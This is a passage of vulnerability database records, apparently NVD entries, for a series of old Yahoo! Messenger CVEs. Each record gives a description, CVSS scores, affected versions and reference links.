"lang": "en",
"value": "Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow."
},
{
"lang": "es",
"value": "Un desbordamiento de entero en el m\u00e9todo CYImage::LoadJPG en YImage.dll en Yahoo! Messenger antes de v11.5.0.155, cuando la compartici\u00f3n fotos est\u00e1 activada, podr\u00eda permitir a atacantes remotos ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de una imagen JPG modificada a mano que genera un desbordamiento de b\u00fafer basado en memoria din\u00e1mica(mont\u00edculo)."
}
],
"id": "CVE-2012-0268",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 4.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2012-01-19T15:55:00.990",
"references": [
{
"source": "PSIRT-CNA@flexerasoftware.com",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/47041"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/47041"
}
],
"sourceIdentifier": "PSIRT-CNA@flexerasoftware.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-189"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2006-06-29 01:05
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger 7.5.0.814 and 7.0.438 allows remote attackers to cause a denial of service (crash) via messages that contain non-ASCII characters, which triggers the crash in jscript.dll.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.0.438:*:*:*:*:*:*:*",
"matchCriteriaId": "451603CE-2DAF-47AF-A1E6-F79A514E1E51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.5.0.814:*:*:*:*:*:*:*",
"matchCriteriaId": "45452EA7-2FE3-496C-A523-6B5CDDB0C540",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 7.5.0.814 and 7.0.438 allows remote attackers to cause a denial of service (crash) via messages that contain non-ASCII characters, which triggers the crash in jscript.dll."
},
{
"lang": "es",
"value": "Yahoo! Messenger v7.5.0.814 y v7.0.438 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (ca\u00edda) a trav\u00e9s de mensajes que contiene caracteres non-ASCII, lo que provoca la ca\u00edda en jscript.dll."
}
],
"id": "CVE-2006-3298",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2006-06-29T01:05:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/20773"
},
{
"source": "cve@mitre.org",
"url": "http://www.security.nnov.ru/Gnews281.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/18622"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27319"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/20773"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.security.nnov.ru/Gnews281.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/18622"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27319"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2003-12-31 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflow in Yahoo! Messenger 5.6 allows remote attackers to cause a denial of service (crash) via a file send request (sendfile) with a large number of "%" (percent) characters after the Yahoo ID.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
"matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger 5.6 allows remote attackers to cause a denial of service (crash) via a file send request (sendfile) with a large number of \"%\" (percent) characters after the Yahoo ID."
}
],
"id": "CVE-2003-1135",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.6,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 4.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2003-12-31T05:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/archive/1/342472"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/8894"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/archive/1/342472"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/8894"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2005-05-19 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive information from other users.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
"matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
"matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive information from other users."
}
],
"id": "CVE-2005-1671",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2005-05-19T04:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://marc.info/?l=bugtraq\u0026m=111643475210982\u0026w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://marc.info/?l=bugtraq\u0026m=111643475210982\u0026w=2"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2005-05-02 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflow in Yahoo! Messenger allows remote attackers to execute arbitrary code via the offline mode.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| yahoo | messenger | 4.0 | |
| yahoo | messenger | 5.0 | |
| yahoo | messenger | 5.0.1046 | |
| yahoo | messenger | 5.0.1065 | |
| yahoo | messenger | 5.0.1232 | |
| yahoo | messenger | 5.5 | |
| yahoo | messenger | 5.5.1249 | |
| yahoo | messenger | 5.6 | |
| yahoo | messenger | 5.6.0.1347 | |
| yahoo | messenger | 5.6.0.1351 | |
| yahoo | messenger | 5.6.0.1355 | |
| yahoo | messenger | 5.6.0.1356 | |
| yahoo | messenger | 5.6.0.1358 | |
| yahoo | messenger | 6.0 | |
| yahoo | messenger | 6.0.0.1643 | |
| yahoo | messenger | 6.0.0.1750 | |
| yahoo | messenger | 6.0.0.1921 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4A5FAAEB-793F-405B-A8D9-872FCEEBFB55",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0.1046:*:*:*:*:*:*:*",
"matchCriteriaId": "E28F9A8C-206B-49D3-9F25-D25F4CD74DF9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0.1065:*:*:*:*:*:*:*",
"matchCriteriaId": "077D9394-E0DB-4BE1-9666-ED98A459D57C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0.1232:*:*:*:*:*:*:*",
"matchCriteriaId": "DB29459E-C84F-46BC-9679-A55D285287E1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5.1249:*:*:*:*:*:*:*",
"matchCriteriaId": "3EC324E2-C08F-4090-82CD-5A64165986F9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
"matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1347:*:*:*:*:*:*:*",
"matchCriteriaId": "CEAC4C7A-4A77-41ED-BC6D-6F962283107E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
"matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1355:*:*:*:*:*:*:*",
"matchCriteriaId": "E025BBCF-8E26-4E83-BA49-9A10E3011428",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1356:*:*:*:*:*:*:*",
"matchCriteriaId": "AC0DD432-79BA-4750-B53C-A5149DACBE08",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1358:*:*:*:*:*:*:*",
"matchCriteriaId": "47ABA651-3F7A-4647-AA21-14B552694A00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1643:*:*:*:*:*:*:*",
"matchCriteriaId": "E9479AAB-AFFD-4976-96AC-B97DE517BFC9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1750:*:*:*:*:*:*:*",
"matchCriteriaId": "0595ECE8-C876-441F-B90A-FC8D80BA1034",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1921:*:*:*:*:*:*:*",
"matchCriteriaId": "F3FFB3BF-1092-46E4-9C0D-FF91E0FB1371",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger allows remote attackers to execute arbitrary code via the offline mode."
}
],
"id": "CVE-2005-0737",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2005-05-02T04:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/12750"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/12750"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2002-12-31 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflow in Yahoo! Messenger before February 2002 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long set_buddygrp field.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://marc.info/?l=bugtraq&m=101439616623230&w=2 | ||
| cve@mitre.org | http://www.cert.org/advisories/CA-2002-16.html | Patch, Third Party Advisory, US Government Resource | |
| cve@mitre.org | http://www.kb.cert.org/vuls/id/755755 | Third Party Advisory, US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://marc.info/?l=bugtraq&m=101439616623230&w=2 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.cert.org/advisories/CA-2002-16.html | Patch, Third Party Advisory, US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.kb.cert.org/vuls/id/755755 | Third Party Advisory, US Government Resource |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger before February 2002 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long set_buddygrp field."
}
],
"id": "CVE-2002-1665",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2002-12-31T05:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/755755"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/755755"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2004-02-03 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflow in Yahoo Instant Messenger 5.6.0.1351 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long filename in the download feature.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
"matchCriteriaId": "491F3341-39C6-46FE-A5A4-DEE5839FCFD2",
"versionEndIncluding": "5.6.0.1351",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo Instant Messenger 5.6.0.1351 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long filename in the download feature."
},
{
"lang": "es",
"value": "Desbordamiento de b\u00fafer en Yahoo Instant Messenger 5.6.0.1351 y anteriores permite que atacantes remotos provoquen una denegaci\u00f3n de servicio (ca\u00edda) y posiblemente ejecuten c\u00f3digo arbitrario mediante un nombre de fichero largo en la opci\u00f3n de descarga."
}
],
"id": "CVE-2004-0043",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2004-02-03T05:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html"
},
{
"source": "cve@mitre.org",
"url": "http://marc.info/?l=bugtraq\u0026m=107357996802255\u0026w=2"
},
{
"source": "cve@mitre.org",
"url": "http://secunia.com/advisories/10573"
},
{
"source": "cve@mitre.org",
"url": "http://www.osvdb.org/3437"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/9383"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1008651"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14171"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://marc.info/?l=bugtraq\u0026m=107357996802255\u0026w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://secunia.com/advisories/10573"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.osvdb.org/3437"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/9383"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1008651"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14171"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2006-10-27 16:07
Modified
2025-04-09 00:30
Severity ?
Summary
Unspecified vulnerability in Yahoo! Messenger (Service 18) before 8.1.0.195 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted room name in a Conference Invite. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in Yahoo! Messenger (Service 18) before 8.1.0.195 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted room name in a Conference Invite. NOTE: the provenance of this information is unknown; the details are obtained from third party information."
},
{
"lang": "es",
"value": "Vulnerabilidad no especificada en Yahoo! Messenger (Service 18) anterior a 8.1.0.195 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (referencia a NULL y ca\u00edda de aplicaci\u00f3n) mediante un nombre de sala manipulado en una Invitaci\u00f3n de Conferencia. NOTA: la procedencia de esta informaci\u00f3n es desconocida; los detalles han sido obtenidos de informaci\u00f3n de terceros."
}
],
"id": "CVE-2006-5563",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2006-10-27T16:07:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0518.html"
},
{
"source": "cve@mitre.org",
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0566.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/22510"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/449667/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/20625"
},
{
"source": "cve@mitre.org",
"url": "http://www.vupen.com/english/advisories/2006/4193"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0518.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0566.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/22510"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/449667/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/20625"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.vupen.com/english/advisories/2006/4193"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2002-06-25 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflow in Yahoo! Messenger 5.0 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long (1) message or (2) IMvironment field.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger 5.0 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long (1) message or (2) IMvironment field."
}
],
"id": "CVE-2002-0320",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2002-06-25T04:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.iss.net/security_center/static/8264.php"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.iss.net/security_center/static/8265.php"
},
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/419419"
},
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/887319"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/4162"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/4163"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.iss.net/security_center/static/8264.php"
},
{
